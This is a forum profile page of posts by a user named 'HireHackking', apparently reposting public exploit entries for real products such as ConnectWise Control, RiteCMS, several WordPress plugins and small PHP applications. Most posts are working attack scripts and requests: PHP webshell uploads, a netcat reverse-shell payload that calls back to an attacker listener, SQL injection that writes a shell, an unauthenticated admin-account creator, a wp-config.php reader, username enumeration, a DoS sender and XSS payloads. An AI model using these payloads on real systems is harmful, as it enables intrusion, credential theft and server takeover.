Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    ConnectWise Control 19.2.24707 - Username Enumeration

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration # Date: 17/12/2021 # Exploit Author: Luca Cuzzolin aka czz78 # Vendor Homepage: https://www.connectwise.com/ # Version: vulnerable <= 19.2.24707 # CVE : CVE-2019-16516 # https://github.com/czz/ScreenConnect-UserEnum from multiprocessing import Process, Queue from statistics import mean from urllib3 import exceptions as urlexcept import argparse import math import re import requests class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKCYAN = '\033[96m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' headers = [] def header_function(header_line): headers.append(header_line) def process_enum(queue, found_queue, wordlist, url, payload, failstr, verbose, proc_id, stop, proxy): try: # Payload to dictionary payload_dict = {} for load in payload: split_load = load.split(":") if split_load[1] != '{USER}': payload_dict[split_load[0]] = split_load[1] else: payload_dict[split_load[0]] = '{USER}' # Enumeration total = len(wordlist) for counter, user in enumerate(wordlist): user_payload = dict(payload_dict) for key, value in user_payload.items(): if value == '{USER}': user_payload[key] = user dataraw = "".join(['%s=%s&' % (key, value) for (key, value) in user_payload.items()])[:-1] headers={"Accept": "*/*" , "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"} req = requests.request('POST',url,headers=headers,data=dataraw, proxies=proxies) x = "".join('{}: {}'.format(k, v) for k, v in req.headers.items()) if re.search(r"{}".format(failstr), str(x).replace('\n','').replace('\r','')): queue.put((proc_id, "FOUND", user)) found_queue.put((proc_id, "FOUND", user)) if stop: break elif verbose: queue.put((proc_id, "TRIED", user)) queue.put(("PERCENT", proc_id, (counter/total)*100)) except (urlexcept.NewConnectionError, requests.exceptions.ConnectionError): print("[ATTENTION] Connection error on process {}! Try lowering the amount of threads with the -c parameter.".format(proc_id)) if __name__ == "__main__": # Arguments parser = argparse.ArgumentParser(description="http://example.com/Login user enumeration tool") parser.add_argument("url", help="http://example.com/Login") parser.add_argument("wordlist", help="username wordlist") parser.add_argument("-c", metavar="cnt", type=int, default=10, help="process (thread) count, default 10, too many processes may cause connection problems") parser.add_argument("-v", action="store_true", help="verbose mode") parser.add_argument("-s", action="store_true", help="stop on first user found") parser.add_argument("-p", metavar="proxy", type=str, help="socks4/5 http/https proxy, ex: socks5://127.0.0.1:9050") args = parser.parse_args() # Arguments to simple variables wordlist = args.wordlist url = args.url payload = ['ctl00%24Main%24userNameBox:{USER}', 'ctl00%24Main%24passwordBox:a', 'ctl00%24Main%24ctl05:Login', '__EVENTTARGET:', '__EVENTARGUMENT:', '__VIEWSTATE:'] verbose = args.v thread_count = args.c failstr = "PasswordInvalid" stop = args.s proxy= args.p print(bcolors.HEADER + """ __ ___ __ ___ | | |__ |__ |__) |__ |\ | | | |\/| |__| ___| |___ | \ |___ | \| |__| | | ScreenConnect POC by czz78 :) """+ bcolors.ENDC); print("URL: "+url) print("Payload: "+str(payload)) print("Fail string: "+failstr) print("Wordlist: "+wordlist) if verbose: print("Verbose mode") if stop: print("Will stop on first user found") proxies = {'http': '', 'https': ''} if proxy: proxies = {'http': proxy, 'https': proxy} print("Initializing processes...") # Distribute wordlist to processes wlfile = open(wordlist, "r", encoding="ISO-8859-1") # or utf-8 tothread = 0 wllist = [[] for i in range(thread_count)] for user in wlfile: wllist[tothread-1].append(user.strip()) if (tothread < thread_count-1): tothread+=1 else: tothread = 0 # Start processes tries_q = Queue() found_q = Queue() processes = [] percentage = [] last_percentage = 0 for i in range(thread_count): p = Process(target=process_enum, args=(tries_q, found_q, wllist[i], url, payload, failstr, verbose, i, stop, proxy)) processes.append(p) percentage.append(0) p.start() print(bcolors.OKBLUE + "Processes started successfully! Enumerating." + bcolors.ENDC) # Main process loop initial_count = len(processes) while True: # Read the process output queue try: oldest = tries_q.get(False) if oldest[0] == 'PERCENT': percentage[oldest[1]] = oldest[2] elif oldest[1] == 'FOUND': print(bcolors.OKGREEN + "[{}] FOUND: {}".format(oldest[0], oldest[2]) + bcolors.ENDC) elif verbose: print(bcolors.OKCYAN + "[{}] Tried: {}".format(oldest[0], oldest[2]) + bcolors.ENDC) except: pass # Calculate completion percentage and print if /10 total_percentage = math.ceil(mean(percentage)) if total_percentage % 10 == 0 and total_percentage != last_percentage: print("{}% complete".format(total_percentage)) last_percentage = total_percentage # Pop dead processes for k, p in enumerate(processes): if p.is_alive() == False: processes.pop(k) # Terminate all processes if -s flag is present if len(processes) < initial_count and stop: for p in processes: p.terminate() # Print results and terminate self if finished if len(processes) == 0: print(bcolors.OKBLUE + "EnumUser finished, and these usernames were found:" + bcolors.ENDC) while True: try: entry = found_q.get(False) print(bcolors.OKGREEN + "[{}] FOUND: {}".format(entry[0], entry[2]) + bcolors.ENDC) except: break quit()
  2. HireHackking

    WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) # Date: 22/12/2021 # Exploit Author: gx1 <gaetano.perrone[at]secsi.io> # Vulnerability Discovery: Gaetano Perrone # Vendor Homepage: https://www.crmperks.com/ # Software Link: https://wordpress.org/plugins/contact-form-entries/ # Version: < 1.1.7 # Tested on: any # References: * https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac * https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/ # Description: Contact Form Entries < 1.1.7 is vulnerable to Unauthenticated Stored Cross-Site Scripting # Technical Details and Exploitation: CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field. When the user uploads a new form, CRM Form Entries checks for the client IP in order to save information about the user: =============================================================================================================== public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388 ============================================================================================================== The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is stored inside the database. # Proof Of Concept: Suppose that you have a Contact Form, intercept the POST request and insert the following Client-IP header =============================================================================================================== POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1 Host: dsp.com:11080 Content-Length: 1411 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ... Client-IP: <img src=a onerror=alert(1)> ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7" 10 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_version" 5.3.1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_locale" en_US ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_unit_tag" wpcf7-f10-p13-o1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_container_post" Content-Disposition: form-data; name="_wpcf7" 10 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_version" 5.3.1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_locale" en_US ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_unit_tag" wpcf7-f10-p13-o1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_container_post" ... =============================================================================================================== The request is acccepted, and the code navigates the section $_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database. When the administrator clicks on the entry element in the plugin, the XSS is triggered. # Solution: Upgrade Contact Form Entries to version 1.1.7
  3. HireHackking

    RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) # Date: 25/07/2021 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://ritecms.com/ # Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip # Version: <= 3.1.0 # Tested on: Windows 10, Ubuntu 18, XAMPP # Google Dork: intext:"Powered by RiteCMS" # Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597 """ ################ # Description # ################ # RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default. # There are 4 ways of bypassing the current file upload protection to achieve remote code execution. # Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved # Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved # Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability. Intercept the request, modify file_name param and place this payload "../webrootExec.php" to upload the php file to web root body= Content-Disposition: form-data; name="file_name" body= ../webrootExec.php So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php # Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" then upload PHP webshell.php - RCE achieved $ cat .htaccess <Files *.php> deny from all </Files> <Files ~ "webshell\.php$"> Allow from all </Files> ################################### # PoC for webshell using Method 2 # ################################### Steps to Reproduce: 1. Login as admin 2. Go to Files Manager 3. Choose a directory to upload .php file either media or files directory. 4. Then, click Upload file > Browse.. 3. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess 4. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory Request: ======== POST /ritecms.v3.1.0/admin.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309 Content-Length: 1744 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="mode" filemanager -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file"; filename="webshell.pHp" Content-Type: application/octet-stream <?php system($_GET[base64_decode('Y21k')]);?> -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="directory" media -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file_name" -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload_mode" 1 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize_xy" x -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize" 640 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="compression" 80 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_resize_xy" x -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_resize" 150 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_compression" 70 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload_file_submit" OK - Upload file -----------------------------410923806710384479662671954309-- #################### # Webshell access: # #################### # Webshell access via: PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id # Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) """
  4. HireHackking

    Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS) # Discovered by: Yehia Elghaly # Discovered Date: 22/12/2021 # Vendor Homepage: https://www.accu-time.com/ # Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/ # Tested Version: 1.0 # Vulnerability Type: Buffer Overflow (DoS) Remote # Tested on OS: linux # Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow # Steps to reproduce: # 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23 # 2. - Run the Script from remote PC/IP # 3. - Telnet Crashed #!/usr/bin/env python3 import socket import sys print("#######################################################") print("# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #") print("# -------------------------- #") print("# BY Yehia Elghaly #") print("#######################################################") if (len(sys.argv)<2): print ("Usage: %s <Target Host> ") % sys.argv[0] print ("Example: %s 192.168.113.1 ") % sys.argv[0] exit(0) print ("\nSending Evil.......Buffer...") s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((sys.argv[1], 23)) buffer = "A"*9400 s.send(" Crashed Check the connection") Print ("Crashed") except: print ("Could not connect to ACCU Time Telnet!")
  5. HireHackking

    WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection # Date 22/12/2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.plugins-market.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip # Version: <= 4.7 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24750 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md ''' Description: The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks ''' # Banner: banner = ''' ___ _ _ ____ ___ ___ ___ __ ___ __ ___ ___ ___ / __)( \/ )( ___)___(__ \ / _ \(__ \ / )___(__ \ /. |(__ )| __) / _ \ ( (__ \ / )__)(___)/ _/( (_) )/ _/ )((___)/ _/(_ _)/ / |__ \( (_) ) \___) \/ (____) (____)\___/(____)(__) (____) (_)(_/ (___/ \___/ [+] WP Visitor Statistics SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse import requests from datetime import datetime # User-Input: my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) my_parser.add_argument('-C', '--COMMAND', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD command = args.COMMAND print('') print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('') # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # Exploit: exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}' exploit = session.get(exploit_url) print(exploit.text) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
  6. HireHackking

    Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 23/12/2021 # Exploit Author: Jeremiasz Pluta # Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System # Software Link: https://github.com/rskoolrash/Online-Admission-System # Tested on: LAMP Stack (Debian 10) #!/usr/bin/python import sys import re import argparse import requests import time import subprocess print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)') path = '/' #change me if the path to the /oas is in the root directory or another subdir class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): payload = """<?php system($_GET['cmd']); ?>""" payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" url = 'http://' + target_ip + ':' + target_port + path r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url + 'documents.php') time.sleep(3) #Upload the payload file print('[*] Uploading the webshell payload...') files = { 'fpic': ('cmd.php', payload + '\n', 'application/x-php'), 'ftndoc': ('', '', 'application/octet-stream'), 'ftcdoc': ('', '', 'application/octet-stream'), 'fdmdoc': ('', '', 'application/octet-stream'), 'ftcdoc': ('', '', 'application/octet-stream'), 'fdcdoc': ('', '', 'application/octet-stream'), 'fide': ('', '', 'application/octet-stream'), 'fsig': ('', '', 'application/octet-stream'), } data = {'fpicup':'Submit Query'} r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data) time.sleep(3) print('[*] Setting up netcat listener...') listener = subprocess.Popen(["nc", "-nvlp", self.localport]) time.sleep(3) print('[*] Spawning reverse shell...') print('[*] Watchout!') r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2) time.sleep(3) if (r3.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()
  7. HireHackking

    Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated) # Date: 22/12/2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html # Version: 1.0 # Tested on: Ubuntu # This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads. import requests import random import string from bs4 import BeautifulSoup url = input("TARGET = ") if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" payload = "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>" let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) resp = requests.get(url) htmlParser = BeautifulSoup(resp.text, 'html.parser') getMenu = htmlParser.findAll("a", {"class": "nav-link"}) selectPage = "" for i in getMenu: if "movie" in i.text.lower(): selectPage = i["href"] break selectPage = selectPage.replace("./","") findSql = url + selectPage resp = requests.get(findSql) htmlParser = BeautifulSoup(resp.text, 'html.parser') movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"}) sqlPage = movieList[0]["href"] sqlPage = sqlPage.replace("./","") sqlPage = url + sqlPage print("\nFinding path") findPath = requests.get(sqlPage + '\'') findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")] findPath = findPath[findPath.index("<b>")+3:len(findPath)] print("injection page: "+sqlPage) parser = findPath.split('\\') parser.pop() findPath = "" for find in parser: findPath += find + "/" print("\nFound Path : " + findPath) SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -" SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php") SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex()) print("\n\nShell Uploading...") status = requests.get(sqlPage+SQLtoRCE) shellOutput = requests.get(url+shellname+".php?tago=whoami") print("\n\nShell Output : "+shellOutput.text) print("\nShell Path : " + url+shellname+".php")
  8. HireHackking

    Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) # Date: 22/12/2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html # Version: 1.0 # Tested on: Windows import requests import json url = input('Url:') if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" Username = "tago" Password = "tagoletta" reqUrl = url + "classes/Users.php?f=save" reqHeaders = { "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Origin": url} reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n" resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) if resp.status_code == 200: print("Admin account created") reqUrl = url + "classes/Login.php?f=login" reqHeaders = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Origin": url } reqData = {"username": ""+Username+"", "password": ""+Password+""} resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) data = json.loads(resp.text) status = data["status"] if status == "success": print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password) else: print("Exploited but not loginned") else: print("Not injectable")
  9. HireHackking

    Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS) # Google Dork: NA # Date: 03-OCT-2021 # Exploit Author: Akash Rajendra Patil # Vendor Homepage: https://www.yahoobaba.net/project/library-system-in-php # Software Link: https://www.yahoobaba.net/project/library-system-in-php # Version: V 1.0 # Tested on: WAMPP # Description # Library System in PHP V1.0 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitisation. # Proof of Concept (PoC) : #Exploit: 1) Goto: http://localhost/library-system/dashboard.php 2) Login as admin using test credentials: admin/admin 3) Goto: http://localhost/library-system/update-publisher.php?pid=12 4) Enter the following payload in the publisher field: <script>alert(document.cookie)</script> 5) Click on Save 6) Our payload is fired and stored
  10. HireHackking

    WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) # Date: 23/12/2021 # Exploit Authors: Nicole Sheinin, Liad Levy # Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/ # Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/ # Version: versions <= 2.2.2 # Tested on: MacOS # CVE: CVE-2021-39312 # Github repo: #!/usr/bin/env python3 import argparse, textwrap import requests import sys parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter) group_must = parser.add_argument_group('must arguments') group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True) parser.add_argument("-p","--payload", help="Path to read [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False) args = parser.parse_args() if len(sys.argv) <= 2: print (f"Exploit Usage: ./exploit.py -h [help] -u [url]") sys.exit() HOST = args.url PAYLOAD = args.payload url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST) payload = "/scripts/simple.php/{}".format(PAYLOAD) r = requests.post(url,data={'src': payload}) if r.status_code == 200: print(r.text) else: print("No exploit found")
  11. HireHackking

    SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS) # Date: 28/12/2021 # Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc) # Vendor Homepage: https://www.safarimontage.com/ # Version: 8.3 and 8.5 # Tested on: Ubuntu Linux [Firefox] # CVE: CVE-2021-45425 # Proof of Concept: GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1 Host: vulnIP Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=SSSION; lang=en Connection: close
  12. HireHackking

    Nettmp NNT 5.1 - SQLi Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass # Date: 23/12/2021 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://wiki.nettemp.tk # Software Link: https://wiki.nettemp.tk # Version: nettmp NNT # Tested on: Linux (Ubuntu 20.04) Payload: username: 1' or 1=1;-- password: \ Proof of Concept: POST /index.php?id=status HTTP/1.1 Host: vuln.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://vuln.com DNT: 1 Connection: close Referer: http://vulnIP/index.php?id=status Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq Upgrade-Insecure-Requests: 1 username=1%27+or+1%3D1%3B--&password=%5C&form_login=log
  13. HireHackking

    Hostel Management System 2.1 - Cross Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hostel Management System 2.1 - Cross Site Scripting (XSS) # Date: 26/12/2021 # Exploit Author: Chinmay Vishwas Divekar # Vendor Homepage: https://phpgurukul.com/hostel-management-system/ # Software Link: https://phpgurukul.com/hostel-management-system/ # Version: V 2.1 # Tested on: PopOS_20.10 *Steps to reproduce* 1) Open book-hostel page using following url https://localhost/hostel/book-hostel.php 2) Enter xss payload <img src=x onerror=alert(String.fromCharCode(88,83,83));> on various input fields. 3) Server Accepted our Payload in input fileds. Affected input fields: Correspondence Address, Guardian Relation, Permanent Address
  14. HireHackking

    AWebServer GhostBuilding 18 - Denial of Service (DoS)

    HireHackking posted a blog entry in Hacker Technology
